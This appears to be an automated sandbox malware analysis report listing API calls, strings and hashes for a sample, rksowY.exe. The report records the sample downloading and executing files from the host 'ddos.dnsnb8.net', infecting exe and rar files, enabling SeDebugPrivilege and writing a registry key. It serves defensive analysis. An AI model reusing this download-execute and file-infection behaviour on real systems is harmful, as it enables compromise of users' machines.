                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: x$z${
                                • API String ID: 0-1334427886
                                • Opcode ID: c74c4cf5841158705ee50ce6f5eb449c392b19487c7c3dff384c7bb0a6d6eeb7
                                • Instruction ID: fda569c41e927c96608d419b0976f89e3f6857d2a6d7f21c023a1679c73cd87f
                                • Opcode Fuzzy Hash: c74c4cf5841158705ee50ce6f5eb449c392b19487c7c3dff384c7bb0a6d6eeb7
                                • Instruction Fuzzy Hash: ED621EB1D0010AEFCF14CF98C989ABEB7B6EF94304F248299E415A7384D7389A55DF91
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d858a5ade902b6bb97af8f2e331c720551899d1822917a6242051e2397e39802
                                • Instruction ID: be37d7774495ca564c6dda464bd4146c5e6f47e0473fce9133ed879fe8953b27
                                • Opcode Fuzzy Hash: d858a5ade902b6bb97af8f2e331c720551899d1822917a6242051e2397e39802
                                • Instruction Fuzzy Hash: 9E712C74E0414A9FDB09CF69C4907BFBBF2EF89304F18C4A9D969AB345D6349942CB90

                                Execution Graph

                                Execution Coverage: 32.2%
                                Dynamic/Decrypted Code Coverage: 6.7%
                                Signature Coverage: 10.9%
                                Total number of Nodes: 285
                                Total number of Limit Nodes: 10

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                • String ID: %s*$C:\$Documents and Settings
                                • API String ID: 2826467728-110786608
                                • Opcode ID: aa503b9cf402b02d563d82e8b570399e6da9818dcabedce4e3f4976656bfd8d5
                                • Instruction ID: a64862c0211e468351514b48982a80ebe8c265534c8461a10deb83ce5cec64a3
                                • Opcode Fuzzy Hash: aa503b9cf402b02d563d82e8b570399e6da9818dcabedce4e3f4976656bfd8d5
                                • Instruction Fuzzy Hash: 704143B2404349AFD761EBA0DC4DDEBBBACFF94315F040929F944D2111E635FA489BA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1729
                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 005B174C
                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 005B177C
                                • __aulldiv.LIBCMT ref: 005B1796
                                • __aulldiv.LIBCMT ref: 005B17A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: TimeValue__aulldiv$FileSystem
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe$SOFTWARE\GTplus$Time
                                • API String ID: 541852442-3888251811
                                • Opcode ID: efbb01cdf50dc7397cee4d8b721827f1d163ffe0ec487a89e89330eaca3aaac6
                                • Instruction ID: c44c4e5c54c2a3d14e6e505b069889b19e2300092eabf3ea6b57315a80385069
                                • Opcode Fuzzy Hash: efbb01cdf50dc7397cee4d8b721827f1d163ffe0ec487a89e89330eaca3aaac6
                                • Instruction Fuzzy Hash: DB115E76A00609BBDB50DA94CC9AFEFBFBCFB44B14F508115F901B6181DA71AA48CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 005B60BE
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 005B60DF
                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 005B6189
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005B61A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 10e621c5a4eb26b359566a0806fcc07a6bdc42547a50d2beac723a7df1477b1e
                                • Instruction ID: bab2a894623870f8045d0e54295b27b432b1fa0b8520ced3aba62395d08a9fe9
                                • Opcode Fuzzy Hash: 10e621c5a4eb26b359566a0806fcc07a6bdc42547a50d2beac723a7df1477b1e
                                • Instruction Fuzzy Hash: 9D1211B25087859FDB328F64CC55BEA7FA4FF02310F1845AED8898B292D678B911CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • memset.MSVCRT ref: 005B2BA6
                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 005B2BB4
                                • GetDriveTypeA.KERNEL32(?), ref: 005B2BD3
                                • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 005B2BEE
                                • lstrlen.KERNEL32(?), ref: 005B2BFB
                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 005B2C16
                                • CreateThread.KERNEL32(00000000,00000000,005B2845,00000000,00000000,00000000), ref: 005B2C3A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                • String ID:
                                • API String ID: 1073171358-0
                                • Opcode ID: 20cbdd852a089ea09b2a7c61cbf02406933637d81e9a54f112c999b8d1f51c5d
                                • Instruction ID: 4caf6c5c4215afd00e6e48092159088c1afd5de3064aa2ba3e4948480c14fb47
                                • Opcode Fuzzy Hash: 20cbdd852a089ea09b2a7c61cbf02406933637d81e9a54f112c999b8d1f51c5d
                                • Instruction Fuzzy Hash: 1121AEB180014CAFE720AF64AC88DEE7F6DFF14344F140229F852A2161D730AE0ADB71

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • SetFileAttributesA.KERNEL32(?,00000080,?,005B32B0,00000164,005B2986,?), ref: 005B1EB9
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 005B1ECD
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 005B1EF3
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 005B1F07
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 005B1F1D
                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 005B201E
                                • memset.MSVCRT ref: 005B20D8
                                • memset.MSVCRT ref: 005B20EA
                                • memcpy.MSVCRT ref: 005B222D
                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B2238
                                • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B224A
                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22C6
                                • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22CB
                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22DD
                                • WriteFile.KERNEL32(000000FF,005B4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22F7
                                • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B230D
                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B2322
                                • UnmapViewOfFile.KERNEL32(?,?,005B32B0,00000164,005B2986,?), ref: 005B2340
                                • FindCloseChangeNotification.KERNEL32(?,?,005B32B0,00000164,005B2986,?), ref: 005B234E
                                • FindCloseChangeNotification.KERNEL32(000000FF,?,005B32B0,00000164,005B2986,?), ref: 005B2359
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
                                • String ID: .@[$5@[$<@[$C@[$m@[
                                • API String ID: 307705342-3256145751

                                Control-flow Graph
                                • Function at 005B1973 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                APIs
                                • PathFileExistsA.SHLWAPI(\N[`N[,00000000,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1992
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005B19BA
                                • Sleep.KERNEL32(00000064), ref: 005B19C6
                                • wsprintfA.USER32 ref: 005B19EC
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 005B1A00
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005B1A1E
                                • GetFileSize.KERNEL32(?,00000000), ref: 005B1A2C
                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005B1A46
                                • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 005B1A65
                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 005B1A90
                                • DeleteFileA.KERNEL32(?), ref: 005B1AA7
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005B1AC1
                                Strings
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B197C
                                • \N[`N[, xrefs: 005B1980
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 005B19DB
                                • %s%.8X.data, xrefs: 005B19E6
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rksowY.exe$\N[`N[
                                • API String ID: 2523042076-1262134562

                                Control-flow Graph
                                • Function at 005B28B8 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                APIs
                                • memset.MSVCRT ref: 005B28D3
                                • wsprintfA.USER32 ref: 005B28F7
                                • memset.MSVCRT ref: 005B2925
                                • wsprintfA.USER32 ref: 005B2940
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2A02
                                  • Part of subcall function 005B29E2: wsprintfA.USER32 ref: 005B2A1A
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2A44
                                  • Part of subcall function 005B29E2: lstrlen.KERNEL32(?), ref: 005B2A54
                                  • Part of subcall function 005B29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 005B2A6C
                                  • Part of subcall function 005B29E2: strrchr.MSVCRT ref: 005B2A7C
                                  • Part of subcall function 005B29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 005B2A9F
                                  • Part of subcall function 005B29E2: lstrlen.KERNEL32(Documents and Settings), ref: 005B2AAE
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2AC6
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2ADA
                                  • Part of subcall function 005B29E2: FindFirstFileA.KERNEL32(?,?), ref: 005B2AEF
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2B13
                                • strrchr.MSVCRT ref: 005B2959
                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 005B2974
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                • API String ID: 3004273771-1791786966

                                Control-flow Graph
                                • Function at 005B1099 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                APIs
                                  • Part of subcall function 005B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1878
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1880
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1890
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1894
                                • WinExec.KERNEL32(?,00000005), ref: 005B10F1
                                • lstrlen.KERNEL32(005B4748), ref: 005B10FA
                                • wsprintfA.USER32 ref: 005B112A
                                • wsprintfA.USER32 ref: 005B1143
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 005B115B
                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 005B1169
                                • Sleep.KERNEL32 ref: 005B1179
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG[$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 1280626985-4116158746

                                Control-flow Graph

                                APIs
                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 005B164F
                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 005B165B
                                • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\rksowY.exe,00000104), ref: 005B166E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 005B16AC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 005B16BD
                                  • Part of subcall function 005B139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B13BC
                                  • Part of subcall function 005B139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005B13DA
                                  • Part of subcall function 005B139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 005B1448
                                • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B16E5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rksowY.exe$C:\Windows\system32$Documents and Settings
                                • API String ID: 123563730-4026290296

                                Control-flow Graph
                                • Function at 005B1000 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                APIs
                                • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG[,http://%s:%d/%s/%s,005B10E8,?), ref: 005B1018
                                • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 005B1029
                                • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 005B1038
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 005B104B
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 005B1075
                                • CloseHandle.KERNEL32(?), ref: 005B108B
                                • CloseHandle.KERNEL32(00000000), ref: 005B108E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                • String ID: HG[$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 1223616889-2694197261

                                Control-flow Graph
                                • Function at 005B2C48 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                APIs
                                • memset.MSVCRT ref: 005B2C57
                                  • Part of subcall function 005B1973: PathFileExistsA.SHLWAPI(\N[`N[,00000000,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1992
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005B19BA
                                  • Part of subcall function 005B1973: Sleep.KERNEL32(00000064), ref: 005B19C6
                                  • Part of subcall function 005B1973: wsprintfA.USER32 ref: 005B19EC
                                  • Part of subcall function 005B1973: CopyFileA.KERNEL32(?,?,00000000), ref: 005B1A00
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005B1A1E
                                  • Part of subcall function 005B1973: GetFileSize.KERNEL32(?,00000000), ref: 005B1A2C
                                  • Part of subcall function 005B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005B1A46
                                  • Part of subcall function 005B1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 005B1A65
                                • CreateThread.KERNEL32(00000000,00000000,005B2B8C,00000000,00000000,00000000), ref: 005B2C99
                                • WaitForMultipleObjects.KERNEL32(00000001,005B16BA,00000001,000000FF,?,005B16BA,00000000), ref: 005B2CAC
                                • VirtualFree.KERNEL32(007E0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\rksowY.exe,005B4E5C,005B4E60,?,005B16BA,00000000), ref: 005B2CC2
                                Strings
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B2C69
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe
                                • API String ID: 2042498389-3988848653

                                Control-flow Graph
                                • Function at 005B14E1 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000), ref: 005B1504
                                • VirtualQuery.KERNEL32(005B14E1,?,0000001C), ref: 005B1525
                                • ExitProcess.KERNEL32 ref: 005B157A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: ExitHandleModuleProcessQueryVirtual
                                • String ID:
                                • API String ID: 3946701194-0

                                Control-flow Graph
                                • Function at 005B1915 (rendered control-flow graph, with Executed / Not Executed node colouring, not reproduced)
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: FileTimememset
                                • String ID:
                                • API String ID: 176422537-0
                                APIs
                                • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,?,?,005B13EF), ref: 005B11AB
                                • OpenProcessToken.ADVAPI32(00000000,00000028,005B13EF,?,?,?,?,?,?,005B13EF), ref: 005B11BB
                                • AdjustTokenPrivileges.ADVAPI32(005B13EF,00000000,?,00000010,00000000,00000000), ref: 005B11EB
                                • CloseHandle.KERNEL32(005B13EF), ref: 005B11FA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,005B13EF), ref: 005B1203
                                Strings
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B11A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe
                                APIs
                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B13BC
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005B13DA
                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 005B1448
                                  • Part of subcall function 005B119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,?,?,005B13EF), ref: 005B11AB
                                  • Part of subcall function 005B119F: OpenProcessToken.ADVAPI32(00000000,00000028,005B13EF,?,?,?,?,?,?,005B13EF), ref: 005B11BB
                                  • Part of subcall function 005B119F: AdjustTokenPrivileges.ADVAPI32(005B13EF,00000000,?,00000010,00000000,00000000), ref: 005B11EB
                                  • Part of subcall function 005B119F: CloseHandle.KERNEL32(005B13EF), ref: 005B11FA
                                  • Part of subcall function 005B119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,005B13EF), ref: 005B1203
                                Strings
                                • SeDebugPrivilege, xrefs: 005B13D3
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B13A8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
